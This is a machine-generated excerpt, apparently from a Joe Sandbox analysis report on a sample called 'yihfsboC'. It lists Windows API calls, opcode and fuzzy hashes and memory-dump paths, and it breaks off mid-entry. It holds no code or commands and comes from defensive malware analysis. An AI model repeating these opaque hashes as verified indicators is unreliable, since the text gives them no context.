                                                                                                                  • API ID: HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4139908857-0
                                                                                                                  • Opcode ID: 7298a4a93a234a4e65fcbb9da8ecdfc796b44f74154d9b7ce8fb60dc01437d5c
                                                                                                                  • Instruction ID: 7c983fc7340aaeacb9adc0d4bf428121d83d5a604ecefc8db1c5e6291cf6602b
                                                                                                                  • Opcode Fuzzy Hash: 7298a4a93a234a4e65fcbb9da8ecdfc796b44f74154d9b7ce8fb60dc01437d5c
                                                                                                                  • Instruction Fuzzy Hash: B63198B4D002599FCB14CFAAD984ADEFBF1AF49310F14906AE818B7360D374A946CF64
                                                                                                                  APIs
                                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 29C4B733
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544849734.0000000029C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 29C40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29c40000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DispatchMessage
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2061451462-0
                                                                                                                  • Opcode ID: 3613ebe29490aaecde87e7d03d01cf5fc267d7b7643fce12a35314360cf533a0
                                                                                                                  • Instruction ID: 0aa79e1e21da7656dc034742ecf9b60f38e3bbf1f90bada034797a2318b151bb
                                                                                                                  • Opcode Fuzzy Hash: 3613ebe29490aaecde87e7d03d01cf5fc267d7b7643fce12a35314360cf533a0
                                                                                                                  • Instruction Fuzzy Hash: 1231AEB8D042099FCB14CFAAD584ADEFBF4AF49320F14906AE818B7350D335A941CFA5
                                                                                                                  APIs
                                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 29C4B733
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544849734.0000000029C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 29C40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29c40000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DispatchMessage
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2061451462-0
                                                                                                                  • Opcode ID: 7118c353f643c181a7565baf66ec7fec9a2b82ffdbe465d60e7cc123b381bb5c
                                                                                                                  • Instruction ID: 130a52a77536faa9af88df10b255be192470320e6c9e7c7a37df96d4145e23fa
                                                                                                                  • Opcode Fuzzy Hash: 7118c353f643c181a7565baf66ec7fec9a2b82ffdbe465d60e7cc123b381bb5c
                                                                                                                  • Instruction Fuzzy Hash: EE218CB9D002499FCB14CFA9D584ADEFBF4AF49320F24906AE818B7350D335A941CF65
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                  • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocString_malloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 959018026-0
                                                                                                                  • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                  • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                  • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                  • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                  APIs
                                                                                                                  • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 10892065-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2534518918.0000000024170000.00000040.00000800.00020000.00000000.sdmp, Offset: 24170000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_24170000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2962429428-0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 91d32f7c62ae128a6c60edf6dfcd6d4848c015c3204678b8aa2dbbd4315adf29
                                                                                                                  • Instruction ID: 85fff11333a970ee281faca78f1349af92d286a709b679f24b44e9d690d48158
                                                                                                                  • Opcode Fuzzy Hash: 91d32f7c62ae128a6c60edf6dfcd6d4848c015c3204678b8aa2dbbd4315adf29
                                                                                                                  • Instruction Fuzzy Hash: 4BD1C434B042048FD729CF78C494AAD7BB6EF89320F6441AAD545DB3B1DA31DC46CBA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b9a971a926a5ce97bb0cfe0fc2cf1d43f8b8fa8a751e3f450ef71507b9efcf35
                                                                                                                  • Instruction ID: 1e655e0a0b37a6dc8575b52a4e4c916c95adbb8a3401e7abd60e2b9ba3e192d6
                                                                                                                  • Opcode Fuzzy Hash: b9a971a926a5ce97bb0cfe0fc2cf1d43f8b8fa8a751e3f450ef71507b9efcf35
                                                                                                                  • Instruction Fuzzy Hash: 31818E34A00205DFCB44DF79C88596FBBF2BF89324B1581AAD906DB365D732E842CB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fa120496459e1472d5d164a33a43ce9123c680d660ec02431cfc042089aaabd4
                                                                                                                  • Instruction ID: aa344a310fde5b0cf1d6f955a74d20236efb4eec20fb2382ff177c295c0af775
                                                                                                                  • Opcode Fuzzy Hash: fa120496459e1472d5d164a33a43ce9123c680d660ec02431cfc042089aaabd4
                                                                                                                  • Instruction Fuzzy Hash: AB71EE34704205CFE70D9B75C895B2F7BAAAF88360B148169D646CB394EF39CC478B90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f605603da6cde39172b143d20b923d753011b80014cde62de4337aa149c963bc
                                                                                                                  • Instruction ID: a5e9e5fbdea586094498841d9e3403f10ec809b625b24164cae9fe80d1478189
                                                                                                                  • Opcode Fuzzy Hash: f605603da6cde39172b143d20b923d753011b80014cde62de4337aa149c963bc
                                                                                                                  • Instruction Fuzzy Hash: 6761FE75B002459FC7189F79D840A9EBBF9FFC8730B64857AE599C7250D730E8028BA0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 76cee08f882c9779012a5e26ec1bbb85189aab13d0722595b17e7a8755995fc9
                                                                                                                  • Instruction ID: 78e89c02fb974aea42d4c998be938f62981764e51896cf4dfb2ff06d4f9a8ab2
                                                                                                                  • Opcode Fuzzy Hash: 76cee08f882c9779012a5e26ec1bbb85189aab13d0722595b17e7a8755995fc9
                                                                                                                  • Instruction Fuzzy Hash: 49A17F74E00229CFDBA8DF69C854B99BBB1BB89300F1081EAD90DA7355DB309E85CF11
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 87409612767939e7c2dee4c57109d8264f426e741946f464132a0ae87c3fff1e
                                                                                                                  • Instruction ID: e8b63983feb8e9d2559f401c22b64c5d6609ccdeb9eacc7c9e9704c8b147e095
                                                                                                                  • Opcode Fuzzy Hash: 87409612767939e7c2dee4c57109d8264f426e741946f464132a0ae87c3fff1e
                                                                                                                  • Instruction Fuzzy Hash: 58613A34B043448FDB295F74945825D3BA6AFC1370F64866EE9928B3E1CE388D46CB5A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2452c5d0899df7f527c38c44a5aa473dcc7667ea24b7e4afef1bc0ecb30f055d
                                                                                                                  • Instruction ID: 0a8c467005373e960c585bac72baa891552d3266e236f7777e33cbd84b412d30
                                                                                                                  • Opcode Fuzzy Hash: 2452c5d0899df7f527c38c44a5aa473dcc7667ea24b7e4afef1bc0ecb30f055d
                                                                                                                  • Instruction Fuzzy Hash: EC61DE75704255DFDB09CF64C845A6B7BFAFF88310F1485A9E5868B2A1EB38C806CB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6e9c15791c9aa1961215caa7fd870bf8de02b6a33ff9cdcc72efc67df3fae6ec
                                                                                                                  • Instruction ID: efd1e299afaeebec0ea8511d58425b9e5476bc7f20940012e0746819bd503f70
                                                                                                                  • Opcode Fuzzy Hash: 6e9c15791c9aa1961215caa7fd870bf8de02b6a33ff9cdcc72efc67df3fae6ec
                                                                                                                  • Instruction Fuzzy Hash: 2A91CF74E412298BDB64DF69C894BEDBBF2AF99300F1081E9D51DA7290EB345E85CF40
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b83ce3568ab8a6290b245c7c3602507fbdecbf11ff514756dbbfd47beb38ca6b
                                                                                                                  • Instruction ID: 67c66c84e35c4d4b171192c4387d4117e7f4cb1aeeb9c846b79f902d7e54d607
                                                                                                                  • Opcode Fuzzy Hash: b83ce3568ab8a6290b245c7c3602507fbdecbf11ff514756dbbfd47beb38ca6b
                                                                                                                  • Instruction Fuzzy Hash: A2817174E012288FDB68DF69C954B9EBBF2BB89200F1081EAD54DA7355DB305E85CF21
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5e37373410e330d788533624991f8efb949274af6bea2052d39fb637756b17aa
                                                                                                                  • Instruction ID: 61a0e52700f079873d0dadb5929d890a6febe7889e78710f47f9697c58f13bb8
                                                                                                                  • Opcode Fuzzy Hash: 5e37373410e330d788533624991f8efb949274af6bea2052d39fb637756b17aa
                                                                                                                  • Instruction Fuzzy Hash: EF512874608111CFC748DF78E894D6B3BF5BB5A3A071140A4E40AEB3A1DB38EC86CB90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a9c0a2801016445e8c635abb3d21c6049cfc45f9d99d1293850b282e234538a3
                                                                                                                  • Instruction ID: 6e5dd7d8bc23278beae7fb5b99037e208d13f974856e0313fd52833153557bca
                                                                                                                  • Opcode Fuzzy Hash: a9c0a2801016445e8c635abb3d21c6049cfc45f9d99d1293850b282e234538a3
                                                                                                                  • Instruction Fuzzy Hash: 90818074E002288FDB68DF69C854B99BBF2BB89300F1081EAD90DA7354DB309E85CF11
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d93b50fb3f78cd0501d5e4031cf2fe27a33437c7c01e429f001f6b2f58821fbd
                                                                                                                  • Instruction ID: 16181ac9db04bc481a7685e116881ba3716b578ecb4cc622df239c24903e81c9
                                                                                                                  • Opcode Fuzzy Hash: d93b50fb3f78cd0501d5e4031cf2fe27a33437c7c01e429f001f6b2f58821fbd
                                                                                                                  • Instruction Fuzzy Hash: 8071B374E412298FDB64DF69CD94BDDBBB2AF89300F1080EAD919A7254EB315E818F50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4366f5288a91c638ec63ea9850a11bbee01abffdaf99c108e4eacadbbd17f43f
                                                                                                                  • Instruction ID: 5c9d397a8cc247c0c7eda5a08c9fcd2964fd6e914aab5e4d08112845434d4283
                                                                                                                  • Opcode Fuzzy Hash: 4366f5288a91c638ec63ea9850a11bbee01abffdaf99c108e4eacadbbd17f43f
                                                                                                                  • Instruction Fuzzy Hash: 3961C474E412298FEB64DF65CD50BDEBBB2AF89300F1080EAD919B7294DB315E819F40
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8fad925de0d5832bee17524e44e4385397f103dc5a5300ac353b88597ec90285
                                                                                                                  • Instruction ID: f5165910b77cdd44f881cde92b61cd1d235e66ab306da47f29457c2e344fb789
                                                                                                                  • Opcode Fuzzy Hash: 8fad925de0d5832bee17524e44e4385397f103dc5a5300ac353b88597ec90285
                                                                                                                  • Instruction Fuzzy Hash: 8141E675E002188FEB64DFAAC8507DEBBF2AF89304F50C0A9C518B7255EB345A86CF55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0fbda7c7249d14ecda244cb7f5690f9a7ec5663137785059a1b92c5da0323780
                                                                                                                  • Instruction ID: 89075d580db4e0117eaa73b9caf2ff21e4720c28936e0ec31f7ba1bac256b2cb
                                                                                                                  • Opcode Fuzzy Hash: 0fbda7c7249d14ecda244cb7f5690f9a7ec5663137785059a1b92c5da0323780
                                                                                                                  • Instruction Fuzzy Hash: 0441C674E012188FEB64CFBAD8507DEBBF2AF89300F50C1A9C419A7255DB345A86CF55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5aef55fbad89610ce0d8e2febcb5b8fa6d620935374fabd3a95e7e0263f117c0
                                                                                                                  • Instruction ID: 69a3f3bc67a60d4862df0997c046d5cdde9a09c9266ff7a366a1c43817a85d98
                                                                                                                  • Opcode Fuzzy Hash: 5aef55fbad89610ce0d8e2febcb5b8fa6d620935374fabd3a95e7e0263f117c0
                                                                                                                  • Instruction Fuzzy Hash: 9441C474E012188FEB68CFAAD94079EBBF2AF89300F50C1B9C518B7255DB345A86CF55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d3aa7a4e00e595fae9096004b4683ddfcefeca5fe560aa04ae479cd4b452b857
                                                                                                                  • Instruction ID: 33f158c37dc8cc388bf33cdc602bf0c13caf484f3ecde7ba45f80f9656d24b38
                                                                                                                  • Opcode Fuzzy Hash: d3aa7a4e00e595fae9096004b4683ddfcefeca5fe560aa04ae479cd4b452b857
                                                                                                                  • Instruction Fuzzy Hash: 7331823520424ADFCB0A8FA4D894AAF3BB6EB98310F108059FD46C7344DB78DD5ADB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ec916a138ecdf2370e6d8b6d15624bcb4272982fd16d00776492afba62a3976c
                                                                                                                  • Instruction ID: b7575c16c2d66ab28b0f7f64ed469b4df18df6b7347023634127af25a86b7e17
                                                                                                                  • Opcode Fuzzy Hash: ec916a138ecdf2370e6d8b6d15624bcb4272982fd16d00776492afba62a3976c
                                                                                                                  • Instruction Fuzzy Hash: 9641D474E00218CFEB68CFAAC84079EBBF2AF89300F50C0A9C40DB7255DB345A868F11
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 99a714bda161e4dc467ff8a08b0eccebb0e8cae65bfd4a767210ca3875da30da
                                                                                                                  • Instruction ID: d056a67a90836934c69f416a8e92a23551850a4ca16b734edd575ea9fde9d34a
                                                                                                                  • Opcode Fuzzy Hash: 99a714bda161e4dc467ff8a08b0eccebb0e8cae65bfd4a767210ca3875da30da
                                                                                                                  • Instruction Fuzzy Hash: E341B875E012188FDB64CFBAC85079EBBF2AF89300F50C0A9C518B7255EB345A86CF55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 52a059e223004dd0217cc990eea5adae7ca18ebd2ebe44a3bcb2705deab48c36
                                                                                                                  • Instruction ID: cd4e886781170b278a07086ff32189183a019a5d61ec0b915a8e475271c63bab
                                                                                                                  • Opcode Fuzzy Hash: 52a059e223004dd0217cc990eea5adae7ca18ebd2ebe44a3bcb2705deab48c36
                                                                                                                  • Instruction Fuzzy Hash: 01311435B002088FDB55DFA8C480E9DBBB6AF88220F555094E501AF365CB71ED86CBA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 23083eb708a0822681f107ec76e90a7eb1439be87b8c5773abf0d94ee978fc39
                                                                                                                  • Instruction ID: 70de2481e2cb92b224fa350caa310d50f1a063eb00fc6cedcf6ca60d18b0e516
                                                                                                                  • Opcode Fuzzy Hash: 23083eb708a0822681f107ec76e90a7eb1439be87b8c5773abf0d94ee978fc39
                                                                                                                  • Instruction Fuzzy Hash: 9E41C874E012188FEB64CFAAD85079EBBF2AF89300F10C1A9C519B7355DB355A86CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e0fb930877ad2b1fc51fe4b7b961a351ae20dafba909f129f1196290473e24b6
                                                                                                                  • Instruction ID: 77668c7887d1ec24e037197f9eb929e3a2ca0b8e7de2bb0707f5849990ca5858
                                                                                                                  • Opcode Fuzzy Hash: e0fb930877ad2b1fc51fe4b7b961a351ae20dafba909f129f1196290473e24b6
                                                                                                                  • Instruction Fuzzy Hash: CA313635B002088FDB55DFA8C480E9DBBB6EF88220F555094E501AF375CB71ED8ACBA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7fa4577c89733514ce3acb4b2b15db350b364a5000bc1304bbcd2b7139fa9383
                                                                                                                  • Instruction ID: 73804989ce3e8951969bfad5f95b994471c56a1fbf89b14076057fd9ef4f99df
                                                                                                                  • Opcode Fuzzy Hash: 7fa4577c89733514ce3acb4b2b15db350b364a5000bc1304bbcd2b7139fa9383
                                                                                                                  • Instruction Fuzzy Hash: 7041B775E01218CFEB64CFAAD85079EBBF2AF89300F10C0A9C419B7255DB345A86CF55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 25b8564d353cccec9542f4582c7fde16d0515cf7e81f5b0aab9a4f668ec64895
                                                                                                                  • Instruction ID: 13ee94d8a10c238cab9d96fdc0e2a5e9d6e00aaa8accc05be1db544c16a20fe5
                                                                                                                  • Opcode Fuzzy Hash: 25b8564d353cccec9542f4582c7fde16d0515cf7e81f5b0aab9a4f668ec64895
                                                                                                                  • Instruction Fuzzy Hash: A741B574E012188FEB68CFAAD9507DEBBF2AF89300F10C0A9C519B7255DB345A86CF54
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e2f125a4970f22880d20a4306be4a1e98c06ddc1bedd7b37d8c24788e0b959f6
                                                                                                                  • Instruction ID: 89a16301dde7956a7b85b6f7c38c26557241555a80328b6820a44719fa18c29a
                                                                                                                  • Opcode Fuzzy Hash: e2f125a4970f22880d20a4306be4a1e98c06ddc1bedd7b37d8c24788e0b959f6
                                                                                                                  • Instruction Fuzzy Hash: 4241B774E01218CFEB64CFAAC95079EBBF2AF89300F10C0AAC419B7255DB355A86CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: eec1a0fa85090a94c6af7e14f41541a4695dbfba383ab96d31874636605a8c21
                                                                                                                  • Instruction ID: 99815d1a59c428d2f292fdfc405430e7a0d9dba0b45fb7f5fb7044d67c2f6fdf
